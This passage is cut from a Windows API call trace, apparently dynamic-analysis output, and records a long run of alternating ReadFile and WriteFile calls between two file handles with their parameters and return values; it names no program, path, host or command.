lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.914] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.915] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.915] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.916] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.917] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.918] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.919] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.920] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.921] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.922] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.922] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.923] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.924] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.925] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.926] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.927] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.928] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.929] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.930] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.931] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.931] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.932] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.933] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.934] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.935] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.936] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.937] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.937] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.938] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.939] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.939] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.940] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.941] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.942] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.943] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.944] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.945] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.945] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.946] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.947] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.947] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.948] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.949] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.950] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.951] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.951] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.953] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.954] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.955] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.955] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.964] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.965] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.966] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.967] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.968] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, 